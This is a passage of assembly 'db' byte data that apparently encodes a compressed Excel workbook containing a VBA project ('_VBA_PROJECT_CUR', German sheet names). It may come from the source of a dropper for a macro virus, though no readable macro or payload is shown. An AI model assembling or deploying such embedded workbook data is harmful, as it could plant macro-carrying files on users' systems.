db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 007h
db 000h, 000h, 000h, 008h, 000h, 000h, 000h, 00Ah
db 000h, 000h, 000h, 019h, 000h, 000h, 000h, 00Bh
db 000h, 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh
db 000h, 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh
db 000h, 000h, 000h, 010h, 000h, 000h, 000h, 011h
db 000h, 000h, 000h, 012h, 000h, 000h, 000h, 014h
db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 015h
db 000h, 000h, 000h, 016h, 000h, 000h, 000h, 017h
db 000h, 000h, 000h, 018h, 000h, 000h, 000h, 01Ah
db 000h, 000h, 000h, 01Dh, 000h, 000h, 000h, 01Bh
db 000h, 000h, 000h, 01Ch, 000h, 000h, 000h, 01Eh
db 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 0FEh
db 0E6h, 0FFh, 0FFh, 0E6h, 088h, 0FFh, 052h, 000h
db 06Fh, 000h, 06Fh, 000h, 074h, 000h, 020h, 000h
db 045h, 000h, 06Eh, 000h, 074h, 000h, 072h, 000h
db 079h, 0E6h, 02Dh, 000h, 016h, 000h, 005h, 000h
db 0E6h, 008h, 0FFh, 002h, 000h, 000h, 000h, 020h
db 008h, 002h, 0E6h, 005h, 000h, 0C0h, 0E6h, 006h
db 000h, 046h, 0E6h, 004h, 000h, 040h, 026h, 06Ch
db 034h, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch
db 04Ah, 03Fh, 085h, 0BFh, 001h, 003h, 000h, 000h
db 000h, 080h, 02Eh, 0E6h, 006h, 000h, 057h, 000h
db 06Fh, 000h, 072h, 000h, 06Bh, 000h, 062h, 000h
db 06Fh, 000h, 06Fh, 000h, 06Bh, 0E6h, 031h, 000h
db 012h, 000h, 002h, 001h, 00Dh, 000h, 000h, 000h
db 0E6h, 008h, 0FFh, 0E6h, 028h, 000h, 092h, 00Ah
db 0E6h, 006h, 000h, 05Fh, 000h, 056h, 000h, 042h
db 000h, 041h, 000h, 05Fh, 000h, 050h, 000h, 052h
db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h
db 000h, 054h, 000h, 05Fh, 000h, 043h, 000h, 055h
db 000h, 052h, 0E6h, 021h, 000h, 022h, 000h, 001h
db 001h, 001h, 000h, 000h, 000h, 00Bh, 000h, 000h
db 000h, 00Ah, 0E6h, 017h, 000h, 0A0h, 03Ch, 035h
db 04Ah, 03Fh, 085h, 0BFh, 001h, 0C0h, 0DDh, 03Ch
db 04Ah, 03Fh, 085h, 0BFh, 001h, 0E6h, 00Ch, 000h
db 056h, 000h, 042h, 000h, 041h, 0E6h, 03Bh, 000h
db 008h, 000h, 001h, 000h, 0E6h, 008h, 0FFh, 005h
db 0E6h, 017h, 000h, 0A0h, 03Ch, 035h, 04Ah, 03Fh
db 085h, 0BFh, 001h, 0A0h, 03Ch, 035h, 04Ah, 03Fh
db 085h, 0BFh, 001h, 0E6h, 00Ch, 000h, 001h, 000h
db 000h, 000h, 002h, 000h, 000h, 000h, 003h, 000h
db 000h, 000h, 004h, 000h, 000h, 000h, 005h, 000h
db 000h, 000h, 006h, 000h, 000h, 000h, 007h, 000h
db 000h, 000h, 008h, 000h, 000h, 000h, 009h, 000h
db 000h, 000h, 00Ah, 000h, 000h, 000h, 00Bh, 000h
db 000h, 000h, 00Ch, 000h, 000h, 000h, 00Dh, 000h
db 000h, 000h, 00Eh, 000h, 000h, 000h, 00Fh, 000h
db 000h, 000h, 010h, 000h, 000h, 000h, 011h, 000h
db 000h, 000h, 012h, 000h, 000h, 000h, 013h, 000h
db 000h, 000h, 014h, 000h, 000h, 000h, 015h, 000h
db 000h, 000h, 016h, 000h, 000h, 000h, 017h, 000h
db 000h, 000h, 018h, 000h, 000h, 000h, 019h, 000h
db 000h, 000h, 01Ah, 000h, 000h, 000h, 01Bh, 000h
db 000h, 000h, 01Ch, 000h, 000h, 000h, 01Dh, 000h
db 000h, 000h, 01Eh, 000h, 000h, 000h, 01Fh, 000h
db 000h, 000h, 020h, 000h, 000h, 000h, 021h, 000h
db 000h, 000h, 022h, 000h, 000h, 000h, 023h, 000h
db 000h, 000h, 024h, 000h, 000h, 000h, 025h, 000h
db 000h, 000h, 026h, 000h, 000h, 000h, 027h, 000h
db 000h, 000h, 028h, 000h, 000h, 000h, 029h, 000h
db 000h, 000h, 02Ah, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 02Ch, 000h, 000h, 000h, 02Dh, 000h
db 000h, 000h, 02Eh, 000h, 000h, 000h, 02Fh, 000h
db 000h, 000h, 030h, 000h, 000h, 000h, 031h, 000h
db 000h, 000h, 032h, 000h, 000h, 000h, 033h, 000h
db 000h, 000h, 034h, 000h, 000h, 000h, 035h, 000h
db 000h, 000h, 036h, 000h, 000h, 000h, 037h, 000h
db 000h, 000h, 038h, 000h, 000h, 000h, 039h, 000h
db 000h, 000h, 03Ah, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 03Ch, 000h, 000h, 000h, 03Dh, 000h
db 000h, 000h, 03Eh, 000h, 000h, 000h, 03Fh, 000h
db 000h, 000h, 040h, 000h, 000h, 000h, 041h, 000h
db 000h, 000h, 042h, 000h, 000h, 000h, 043h, 000h
db 000h, 000h, 044h, 000h, 000h, 000h, 045h, 000h
db 000h, 000h, 046h, 000h, 000h, 000h, 047h, 000h
db 000h, 000h, 048h, 000h, 000h, 000h, 049h, 000h
db 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh, 04Bh, 000h
db 000h, 000h, 04Ch, 000h, 000h, 000h, 04Dh, 000h
db 000h, 000h, 04Eh, 000h, 000h, 000h, 04Fh, 000h
db 000h, 000h, 050h, 000h, 000h, 000h, 051h, 000h
db 000h, 000h, 052h, 000h, 000h, 000h, 053h, 000h
db 000h, 000h, 054h, 000h, 000h, 000h, 055h, 000h
db 000h, 000h, 056h, 000h, 000h, 000h, 057h, 000h
db 000h, 000h, 058h, 000h, 000h, 000h, 059h, 000h
db 000h, 000h, 05Ah, 000h, 000h, 000h, 05Bh, 000h
db 000h, 000h, 05Ch, 000h, 000h, 000h, 05Dh, 000h
db 000h, 000h, 05Eh, 000h, 000h, 000h, 05Fh, 000h
db 000h, 000h, 060h, 000h, 000h, 000h, 061h, 000h
db 000h, 000h, 062h, 000h, 000h, 000h, 063h, 000h
db 000h, 000h, 064h, 000h, 000h, 000h, 065h, 000h
db 000h, 000h, 066h, 000h, 000h, 000h, 0FEh, 0FFh
db 0FFh, 0FFh, 068h, 000h, 000h, 000h, 069h, 000h
db 000h, 000h, 06Ah, 000h, 000h, 000h, 06Bh, 000h
db 000h, 000h, 06Ch, 000h, 000h, 000h, 06Dh, 000h
db 000h, 000h, 06Eh, 000h, 000h, 000h, 06Fh, 000h
db 000h, 000h, 070h, 000h, 000h, 000h, 071h, 000h
db 000h, 000h, 072h, 000h, 000h, 000h, 073h, 000h
db 000h, 000h, 074h, 000h, 000h, 000h, 075h, 000h
db 000h, 000h, 076h, 000h, 000h, 000h, 077h, 000h
db 000h, 000h, 078h, 000h, 000h, 000h, 079h, 000h
db 000h, 000h, 07Ah, 000h, 000h, 000h, 07Bh, 000h
db 000h, 000h, 07Ch, 000h, 000h, 000h, 07Dh, 000h
db 000h, 000h, 07Eh, 000h, 000h, 000h, 07Fh, 000h
db 000h, 000h, 080h, 000h, 000h, 000h, 009h, 008h
db 010h, 000h, 000h, 006h, 005h, 000h, 0D3h, 010h
db 0CCh, 007h, 041h, 000h, 000h, 000h, 006h, 000h
db 000h, 000h, 0E1h, 000h, 002h, 000h, 0B0h, 004h
db 0C1h, 000h, 002h, 000h, 000h, 000h, 0E2h, 000h
db 000h, 000h, 05Ch, 000h, 070h, 000h, 001h, 000h
db 000h, 042h, 0E6h, 06Ch, 020h, 042h, 000h, 002h
db 000h, 0B0h, 004h, 061h, 001h, 002h, 000h, 000h
db 000h, 03Dh, 001h, 002h, 000h, 001h, 000h, 0D3h
db 000h, 000h, 000h, 0BAh, 001h, 014h, 000h, 011h
db 000h, 000h, 044h, 069h, 065h, 073h, 065h, 041h
db 072h, 062h, 065h, 069h, 074h, 073h, 06Dh, 061h
db 070h, 070h, 065h, 09Ch, 000h, 002h, 000h, 00Eh
db 000h, 019h, 000h, 002h, 000h, 000h, 000h, 012h
db 000h, 002h, 000h, 000h, 000h, 013h, 000h, 002h
db 000h, 000h, 000h, 0AFh, 001h, 002h, 000h, 000h
db 000h, 0BCh, 001h, 002h, 000h, 000h, 000h, 03Dh
db 000h, 012h, 000h, 0F0h, 000h, 087h, 000h, 0DCh
db 023h, 094h, 011h, 039h, 0E6h, 005h, 000h, 001h
db 000h, 058h, 002h, 040h, 000h, 002h, 000h, 000h
db 000h, 08Dh, 000h, 002h, 000h, 000h, 000h, 022h
db 000h, 002h, 000h, 000h, 000h, 00Eh, 000h, 002h
db 000h, 001h, 000h, 0B7h, 001h, 002h, 000h, 000h
db 000h, 0DAh, 000h, 002h, 000h, 000h, 000h, 031h
db 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h, 0FFh
db 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h, 001h
db 041h, 000h, 072h, 000h, 069h, 000h, 061h, 000h
db 06Ch, 000h, 031h, 000h, 01Ah, 000h, 0C8h, 000h
db 000h, 000h, 0FFh, 07Fh, 090h, 001h, 0E6h, 006h
db 000h, 005h, 001h, 041h, 000h, 072h, 000h, 069h
db 000h, 061h, 000h, 06Ch, 000h, 031h, 000h, 01Ah
db 000h, 0C8h, 000h, 000h, 000h, 0FFh, 07Fh, 090h
db 001h, 0E6h, 006h, 000h, 005h, 001h, 041h, 000h
db 072h, 000h, 069h, 000h, 061h, 000h, 06Ch, 000h
db 031h, 000h, 01Ah, 000h, 0C8h, 000h, 000h, 000h
db 0FFh, 07Fh, 090h, 001h, 0E6h, 006h, 000h, 005h
db 001h, 041h, 000h, 072h, 000h, 069h, 000h, 061h
db 000h, 06Ch, 000h, 01Eh, 004h, 01Eh, 000h, 005h
db 000h, 019h, 000h, 000h, 022h, 0F6h, 053h, 022h
db 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h, 03Bh
db 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h
db 023h, 02Ch, 023h, 023h, 030h, 01Eh, 004h, 023h
db 000h, 006h, 000h, 01Eh, 000h, 000h, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h
db 030h, 03Bh, 05Bh, 052h, 065h, 064h, 05Dh, 05Ch
db 02Dh, 022h, 0F6h, 053h, 022h, 05Ch, 020h, 023h
db 02Ch, 023h, 023h, 030h, 01Eh, 004h, 024h, 000h
db 007h, 000h, 01Fh, 000h, 000h, 022h, 0F6h, 053h
db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 03Bh, 05Ch, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h
db 030h, 02Eh, 030h, 030h, 01Eh, 004h, 029h, 000h
db 008h, 000h, 024h, 000h, 000h, 022h, 0F6h, 053h
db 022h, 05Ch, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 03Bh, 05Bh, 052h, 065h, 064h
db 05Dh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch
db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h
db 030h, 01Eh, 004h, 03Eh, 000h, 02Ah, 000h, 039h
db 000h, 000h, 05Fh, 02Dh, 022h, 0F6h, 053h, 022h
db 05Ch, 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h
db 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch
db 023h, 023h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h
db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 040h, 05Fh, 02Dh, 01Eh, 004h, 02Ch, 000h, 029h
db 000h, 027h, 000h, 000h, 05Fh, 02Dh, 02Ah, 020h
db 023h, 02Ch, 023h, 023h, 030h, 05Fh, 02Dh, 03Bh
db 05Ch, 02Dh, 02Ah, 020h, 023h, 02Ch, 023h, 023h
db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h
db 022h, 02Dh, 022h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 040h, 05Fh, 02Dh, 01Eh, 004h, 046h, 000h, 02Ch
db 000h, 041h, 000h, 000h, 05Fh, 02Dh, 022h, 0F6h
db 053h, 022h, 05Ch, 020h, 02Ah, 020h, 023h, 02Ch
db 023h, 023h, 030h, 02Eh, 030h, 030h, 05Fh, 02Dh
db 03Bh, 05Ch, 02Dh, 022h, 0F6h, 053h, 022h, 05Ch
db 020h, 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h
db 02Eh, 030h, 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh
db 022h, 0F6h, 053h, 022h, 05Ch, 020h, 02Ah, 020h
db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh
db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 01Eh, 004h, 034h
db 000h, 02Bh, 000h, 02Fh, 000h, 000h, 05Fh, 02Dh
db 02Ah, 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh
db 030h, 030h, 05Fh, 02Dh, 03Bh, 05Ch, 02Dh, 02Ah
db 020h, 023h, 02Ch, 023h, 023h, 030h, 02Eh, 030h
db 030h, 05Fh, 02Dh, 03Bh, 05Fh, 02Dh, 02Ah, 020h
db 022h, 02Dh, 022h, 03Fh, 03Fh, 05Fh, 02Dh, 03Bh
db 05Fh, 02Dh, 040h, 05Fh, 02Dh, 0E0h, 000h, 014h
db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 0E6h, 00Bh
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h
db 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h
db 014h, 000h, 001h, 000h, 000h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 000h, 002h, 000h, 000h
db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h
db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h
db 002h, 000h, 000h, 000h, 0F5h, 0FFh, 020h, 000h
db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h
db 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h
db 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h
db 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h, 008h
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h, 005h
db 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h, 0E6h
db 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h, 0E6h
db 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F4h
db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h
db 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h
db 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h, 000h
db 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 0E6h, 005h, 000h, 0F5h, 0FFh
db 020h, 000h, 000h, 0F4h, 0E6h, 008h, 000h, 0C0h
db 020h, 0E0h, 000h, 014h, 0E6h, 005h, 000h, 001h
db 000h, 020h, 0E6h, 00Bh, 000h, 0C0h, 020h, 0E0h
db 000h, 014h, 000h, 001h, 000h, 02Bh, 000h, 0F5h
db 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h, 000h
db 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h, 000h
db 029h, 000h, 0F5h, 0FFh, 020h, 000h, 000h, 0F8h
db 0E6h, 008h, 000h, 0C0h, 020h, 0E0h, 000h, 014h
db 000h, 001h, 000h, 009h, 000h, 0F5h, 0FFh, 020h
db 000h, 000h, 0F8h, 0E6h, 008h, 000h, 0C0h, 020h
db 0E0h, 000h, 014h, 000h, 001h, 000h, 02Ch, 000h
db 0F5h, 0FFh, 020h, 000h, 000h, 0F8h, 0E6h, 008h
db 000h, 0C0h, 020h, 0E0h, 000h, 014h, 000h, 001h
db 000h, 02Ah, 000h, 0F5h, 0FFh, 020h, 000h, 000h
db 0F8h, 0E6h, 008h, 000h, 0C0h, 020h, 093h, 002h
db 004h, 000h, 010h, 080h, 003h, 0FFh, 093h, 002h
db 004h, 000h, 011h, 080h, 006h, 0FFh, 093h, 002h
db 004h, 000h, 012h, 080h, 005h, 0FFh, 093h, 002h
db 004h, 000h, 000h, 080h, 000h, 0FFh, 093h, 002h
db 004h, 000h, 013h, 080h, 004h, 0FFh, 093h, 002h
db 004h, 000h, 014h, 080h, 007h, 0FFh, 060h, 001h
db 002h, 000h, 001h, 000h, 085h, 000h, 010h, 000h
db 086h, 009h, 0E6h, 004h, 000h, 008h, 000h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 08Ch
db 000h, 004h, 000h, 031h, 000h, 02Bh, 000h, 0FCh
db 000h, 008h, 0E6h, 009h, 000h, 0FFh, 000h, 0FAh
db 003h, 008h, 000h, 0FFh, 0FFh, 040h, 000h, 000h
db 000h, 040h, 010h, 045h, 000h, 000h, 000h, 040h
db 000h, 001h, 000h, 000h, 000h, 00Ch, 000h, 040h
db 000h, 051h, 004h, 0E6h, 00Ah, 000h, 085h, 084h
db 0F7h, 0BFh, 001h, 000h, 000h, 000h, 09Ch, 084h
db 0F7h, 0BFh, 000h, 000h, 040h, 000h, 001h, 000h
db 000h, 000h, 038h, 0C6h, 062h, 0E6h, 005h, 000h
db 001h, 0E6h, 007h, 000h, 005h, 040h, 000h, 080h
db 002h, 094h, 0F7h, 0BFh, 000h, 000h, 040h, 000h
db 004h, 000h, 000h, 000h, 0E0h, 006h, 09Ch, 000h
db 00Ah, 000h, 000h, 000h, 020h, 000h, 000h, 000h
db 0FAh, 07Eh, 070h, 030h, 00Ah, 000h, 000h, 000h
db 00Ah, 000h, 000h, 000h, 007h, 00Ch, 000h, 000h
db 001h, 000h, 000h, 000h, 0E8h, 006h, 09Ch, 000h
db 0B4h, 0C5h, 062h, 0E6h, 00Dh, 000h, 0E6h, 008h
db 0FFh, 09Ch, 030h, 075h, 0E6h, 005h, 000h, 069h
db 000h, 075h, 000h, 0FFh, 0FFh, 0FFh, 0E7h, 0E6h
db 004h, 000h, 05Ch, 000h, 063h, 000h, 005h, 000h
db 000h, 000h, 05Ch, 000h, 064h, 000h, 065h, 000h
db 06Dh, 000h, 003h, 0E6h, 007h, 000h, 028h, 0D0h
db 09Dh, 030h, 0E6h, 008h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 014h, 000h, 002h, 007h, 002h, 002h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 003h, 000h, 000h
db 000h, 070h, 000h, 07Eh, 030h, 0C3h, 07Ch, 070h
db 030h, 004h, 000h, 000h, 000h, 004h, 0E6h, 007h
db 000h, 001h, 000h, 000h, 000h, 04Eh, 087h, 075h
db 000h, 082h, 0D8h, 07Eh, 030h, 003h, 000h, 000h
db 000h, 003h, 0E6h, 00Bh, 000h, 061h, 07Ah, 070h
db 030h, 0D4h, 006h, 09Ch, 000h, 00Ah, 000h, 000h
db 000h, 0A0h, 0C5h, 062h, 000h, 00Ah, 000h, 000h
db 000h, 001h, 000h, 000h, 000h, 00Ah, 000h, 000h
db 000h, 0A0h, 0C5h, 062h, 000h, 0D4h, 006h, 09Ch
db 000h, 00Ah, 0E6h, 00Bh, 000h, 028h, 0D0h, 09Dh
db 030h, 0E6h, 008h, 000h, 002h, 000h, 000h, 000h
db 0FFh, 003h, 000h, 000h, 001h, 000h, 000h, 000h
db 001h, 000h, 000h, 000h, 001h, 000h, 000h, 000h
db 020h, 010h, 000h, 000h, 018h, 0E6h, 007h, 000h
db 084h, 0F6h, 053h, 030h, 05Ch, 0C5h, 062h, 000h
db 05Dh, 0E6h, 007h, 000h, 002h, 000h, 0C8h, 030h
db 000h, 000h, 0C5h, 030h, 0E6h, 004h, 000h, 061h
db 07Ah, 070h, 030h, 04Ch, 087h, 075h, 000h, 004h
db 000h, 000h, 000h, 07Eh, 00Eh, 002h, 002h, 0E1h
db 03Ch, 06Dh, 030h, 016h, 000h, 0C8h, 030h, 0D3h
db 000h, 000h, 000h, 09Eh, 0C5h, 062h, 000h, 0FCh
db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0CDh
db 015h, 004h, 030h, 000h, 000h, 0C5h, 030h, 004h
db 02Ah, 0C8h, 030h, 039h, 015h, 000h, 030h, 007h
db 00Ch, 000h, 000h, 001h, 000h, 000h, 000h, 0D4h
db 006h, 09Ch, 000h, 00Ah, 000h, 000h, 000h, 0A0h
db 0C5h, 062h, 000h, 00Ah, 000h, 000h, 000h, 0D0h
db 006h, 09Ch, 0E6h, 005h, 000h, 0A0h, 0C7h, 062h
db 000h, 05Dh, 0E6h, 007h, 000h, 08Eh, 08Fh, 00Fh
db 030h, 0E6h, 004h, 000h, 09Ch, 0C5h, 062h, 000h
db 00Bh, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 070h
db 006h, 09Ch, 000h, 0DCh, 0C7h, 062h, 000h, 004h
db 000h, 000h, 000h, 00Bh, 000h, 057h, 000h, 0E4h
db 000h, 068h, 000h, 072h, 000h, 075h, 000h, 06Eh
db 000h, 067h, 000h, 020h, 000h, 05Bh, 000h, 030h
db 000h, 05Dh, 000h, 000h, 000h, 05Fh, 000h, 000h
db 000h, 001h, 000h, 008h, 000h, 09Ah, 00Dh, 0E6h
db 004h, 000h, 0AEh, 082h, 070h, 030h, 007h, 00Ch
db 000h, 000h, 001h, 000h, 000h, 000h, 04Ch, 087h
db 075h, 000h, 004h, 000h, 000h, 000h, 080h, 0D8h
db 07Eh, 030h, 004h, 000h, 000h, 000h, 0AEh, 082h
db 070h, 030h, 007h, 00Ch, 000h, 000h, 001h, 000h
db 000h, 000h, 064h, 000h, 098h, 000h, 002h, 000h
db 000h, 000h, 065h, 010h, 000h, 030h, 064h, 000h
db 098h, 000h, 096h, 06Ah, 054h, 030h, 004h, 000h
db 000h, 000h, 0D9h, 010h, 000h, 030h, 096h, 06Ah
db 054h, 030h, 052h, 070h, 054h, 030h, 0C2h, 0C8h
db 010h, 030h, 096h, 01Ah, 09Ah, 000h, 050h, 000h
db 098h, 000h, 065h, 010h, 000h, 030h, 050h, 000h
db 098h, 000h, 096h, 01Ah, 09Ah, 000h, 002h, 000h
db 000h, 000h, 0DDh, 088h, 00Fh, 030h, 096h, 01Ah
db 09Ah, 000h, 050h, 000h, 098h, 000h, 001h, 000h
db 000h, 000h, 060h, 01Ah, 09Ah, 0E6h, 005h, 000h
db 008h, 000h, 098h, 000h, 0FCh, 001h, 098h, 0E6h
db 009h, 000h, 0A4h, 01Ah, 09Ah, 0E6h, 00Dh, 000h
db 03Fh, 0E6h, 007h, 000h, 0B0h, 0C6h, 062h, 000h
db 039h, 086h, 00Fh, 030h, 006h, 000h, 000h, 000h
db 060h, 01Ah, 09Ah, 000h, 02Dh, 000h, 000h, 000h
db 007h, 000h, 000h, 000h, 006h, 002h, 098h, 000h
db 0DEh, 0C7h, 062h, 000h, 0DCh, 0C7h, 062h, 000h
db 008h, 000h, 098h, 000h, 007h, 000h, 000h, 000h
db 03Dh, 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h
db 0E6h, 004h, 000h, 065h, 010h, 000h, 030h, 070h
db 06Ah, 054h, 030h, 0ECh, 004h, 09Ah, 000h, 04Ch
db 000h, 000h, 000h, 0D9h, 010h, 000h, 030h, 0ECh
db 004h, 09Ah, 000h, 070h, 06Ah, 054h, 030h, 04Ch
db 000h, 000h, 000h, 0CEh, 05Ah, 054h, 030h, 0BAh
db 0C7h, 062h, 000h, 0C0h, 0C7h, 062h, 0E6h, 00Dh
db 000h, 0A2h, 0C7h, 010h, 030h, 009h, 004h, 0E6h
db 00Ah, 000h, 024h, 000h, 000h, 000h, 0FCh, 0E7h
db 062h, 000h, 0F3h, 083h, 00Fh, 030h, 04Ch, 0C7h
db 062h, 000h, 001h, 000h, 000h, 000h, 010h, 0A3h
db 09Ah, 0E6h, 009h, 000h, 0C0h, 0C7h, 062h, 0E6h
db 005h, 000h, 010h, 0A3h, 09Ah, 0E6h, 005h, 000h
db 0F4h, 0C6h, 062h, 000h, 06Eh, 083h, 00Fh, 030h
db 0E6h, 024h, 000h, 038h, 005h, 09Ch, 000h, 0DCh
db 0C7h, 062h, 000h, 014h, 000h, 000h, 000h, 0E0h
db 000h, 000h, 000h, 0A8h, 0C7h, 062h, 000h, 0FCh
db 0E7h, 062h, 0E6h, 005h, 000h, 01Ch, 0A2h, 09Ah
db 000h, 0C4h, 0C7h, 062h, 000h, 09Ah, 020h, 000h
db 030h, 01Ch, 0A2h, 09Ah, 000h, 073h, 090h, 00Ah
db 000h, 000h, 000h, 009h, 008h, 010h, 000h, 000h
db 006h, 010h, 000h, 0D3h, 010h, 0CCh, 007h, 041h
db 000h, 000h, 000h, 006h, 000h, 000h, 000h, 00Bh
db 002h, 010h, 0E6h, 00Dh, 000h, 03Eh, 00Ah, 000h
db 000h, 00Dh, 000h, 002h, 000h, 001h, 000h, 00Ch
db 000h, 002h, 000h, 064h, 000h, 00Fh, 000h, 002h
db 000h, 001h, 000h, 011h, 000h, 002h, 000h, 000h
db 000h, 010h, 000h, 008h, 000h, 0FCh, 0A9h, 0F1h
db 0D2h, 04Dh, 062h, 050h, 03Fh, 05Fh, 000h, 002h
db 000h, 001h, 000h, 02Ah, 000h, 002h, 000h, 000h
db 000h, 02Bh, 000h, 002h, 000h, 000h, 000h, 082h
db 000h, 002h, 000h, 001h, 000h, 080h, 000h, 008h
db 0E6h, 009h, 000h, 025h, 002h, 004h, 000h, 000h
db 000h, 0FFh, 000h, 081h, 000h, 002h, 000h, 0C1h
db 004h, 014h, 000h, 000h, 000h, 015h, 000h, 000h
db 000h, 083h, 000h, 002h, 000h, 000h, 000h, 084h
db 000h, 002h, 000h, 000h, 000h, 0A1h, 000h, 022h
db 000h, 000h, 000h, 0FFh, 000h, 001h, 000h, 001h
db 000h, 001h, 000h, 004h, 000h, 0DEh, 0C7h, 062h
db 000h, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh
db 03Fh, 08Ah, 01Dh, 03Ch, 0FCh, 0FDh, 07Eh, 0DFh
db 03Fh, 0CEh, 05Ah, 055h, 000h, 002h, 000h, 00Ah
db 000h, 000h, 002h, 00Eh, 0E6h, 00Fh, 000h, 03Eh
db 002h, 012h, 000h, 0B6h, 006h, 0E6h, 004h, 000h
db 040h, 0E6h, 00Bh, 000h, 01Dh, 000h, 00Fh, 000h
db 003h, 0E6h, 006h, 000h, 001h, 0E6h, 007h, 000h
db 0BAh, 001h, 00Bh, 000h, 008h, 000h, 000h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 00Ah
db 0E6h, 031h, 000h, 001h, 016h, 001h, 000h, 000h
db 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h, 004h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h, 000h
db 000h, 003h, 000h, 000h, 000h, 005h, 000h, 000h
db 000h, 007h, 000h, 000h, 000h, 0E6h, 008h, 0FFh
db 001h, 001h, 008h, 000h, 000h, 000h, 0E6h, 004h
db 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h, 000h
db 000h, 0AFh, 002h, 000h, 000h, 0F5h, 001h, 000h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 001h
db 000h, 000h, 000h, 0B5h, 031h, 0B7h, 031h, 000h
db 000h, 0FFh, 0FFh, 023h, 000h, 000h, 000h, 088h
db 000h, 000h, 000h, 008h, 0E6h, 020h, 000h, 0FFh
db 0FFh, 000h, 000h, 0CBh, 002h, 000h, 000h, 0D6h
db 000h, 000h, 000h, 0D6h, 000h, 000h, 000h, 01Fh
db 003h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 0DFh, 000h, 0FFh, 0FFh, 0E6h, 004h
db 000h, 00Ch, 000h, 0E6h, 058h, 0FFh, 044h, 000h
db 069h, 000h, 065h, 000h, 073h, 000h, 065h, 000h
